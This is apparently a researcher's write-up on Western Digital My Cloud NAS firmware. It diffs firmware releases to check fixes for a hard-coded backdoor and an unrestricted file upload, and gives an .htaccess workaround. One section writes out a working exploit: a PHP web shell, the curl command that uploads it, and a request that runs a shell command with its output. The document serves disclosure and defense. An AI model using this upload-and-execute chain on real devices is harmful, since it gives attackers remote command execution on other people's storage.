Description of vulnerabilities: WDMyCloud Multiple Vulnerabilities
- More details on unrestricted file upload vulnerability: https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29
- Metasploit for file upload vulnerability: https://packetstormsecurity.com/files/145447/wd_mycloud_multiupload_upload.rb.txt
Both critical vulnerabilities (the hard-coded backdoor and the file upload vulnerability) have been corrected as of 2018-01-12 with the following firmwares:
My Cloud device | Firmware |
---|---|
Mirror | 2.11.169 |
EX2 | 2.11.169 |
EX4 | 2.11.169 |
My Cloud | 2.30.181 |
EX2 Ultra | 2.30.181 |
Mirror Gen2 | 2.30.181 |
EX2100 | 2.30.181 |
EX4100 | 2.30.181 |
DL2100 | 2.30.181 |
DL4100 | 2.30.181 |
PR2100 | 2.30.181 |
PR4100 | 2.30.181 |
It appears that Western Digital simply removed the offending files from the firmware to correct the vulnerabilities:
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.169.bin
binwalk -e My_Cloud_BZVM_2.11.169.bin
$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php': No such file or directory
$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
-
Set your My Cloud device IP
mycloudip=192.168.0.1
-
Block multi_uploadify.php with an .htaccess file
printf "RewriteRule ^web/jquery/uploader/multi_uploadify.php - [L,R=404]\n" > /tmp/.htaccess curl -v "http://$mycloudip/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/.htaccess"
-
Verify multi_uploadify.php returns a 404 code
$ curl -I "http://$mycloudip/web/jquery/uploader/multi_uploadify.php" HTTP/1.1 404 Not Found
Setup
sudo apt install binwalk
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.164.bin
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.168.bin
binwalk -e My_Cloud_BZVM_2.11.164.bin
binwalk -e My_Cloud_BZVM_2.11.168.bin
01 - Unrestricted file upload: vulnerability not remediated
$ diff _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
printf "<?php echo system(\$_GET['cmd']); ?>" > /tmp/phpshell.php
$ curl -v "http://192.168.0.1/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/phpshell.php"
* Trying 192.168.0.1...
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> POST /web/jquery/uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 245
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------9bdc535de1b1c15e
>
< HTTP/1.1 100 Continue
< HTTP/1.1 302 Found
< Date: Sun, 07 Jan 2018 20:18:43 GMT
< Server: Apache
< X-Powered-By: PHP/5.4.16
< Location: ?status=1
< Content-Length: 0
< Content-Type: text/html
< Content-Language: en
* HTTP error before end of send, stop sending
<
* Closing connection 0
$ curl 'http://192.168.0.1/phpshell.php?cmd=ls%20%2F'
CacheVolume
bin
dev
etc
home
lib
linuxrc
lost+found
mnt
nfs
opt
proc
root
sbin
shares
sys
system
tmp
usr
var
02 - Hard coded backdoor: vulnerability remediated
$ ls _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
Setup
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.172.bin
binwalk -e My_Cloud_BWVZ_2.30.165.bin
binwalk -e My_Cloud_BWVZ_2.30.172.bin
01 - Unrestricted file upload: vulnerability appears to not be remediated
$ diff _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
02 - Hard coded backdoor: vulnerability remediated
$ ls _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
Setup
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.174.bin
binwalk -e My_Cloud_BVBZ_2.30.165.bin
binwalk -e My_Cloud_BVBZ_2.30.174.bin
01 - Unrestricted file upload: vulnerability appears to not be remediated
$ diff _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
02 - Hard coded backdoor: vulnerability remediated
$ ls _My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi': No such file or directory
The hard-coded backdoor vulnerability appears to have been remediated in the latest versions of My Cloud firmwares due to the file nas_sharing.cgi having been removed. However, I see no evidence that the unrestricted file upload vulnerability was remediated in any version of the My Cloud firmware. In particular, there have been no changes to the file multi_uploadify.php between any recent versions of the firwmare, and the file is identical between My_Cloud_BVBZ_2.30.165.bin (where GulfTech confirmed the vulnerability) and My_Cloud_BVBZ_2.30.174.bin (where the vulnerability was supposedly remediated):
$ diff -s _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical
I can confirm the unrestricted file upload vulnerability is present in firmware My_Cloud_BZVM_2.11.168.bin (see above), and multi_uploadify.php is also the same between that version and My_Cloud_BVBZ_2.30.174.bin:
$ diff -s _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical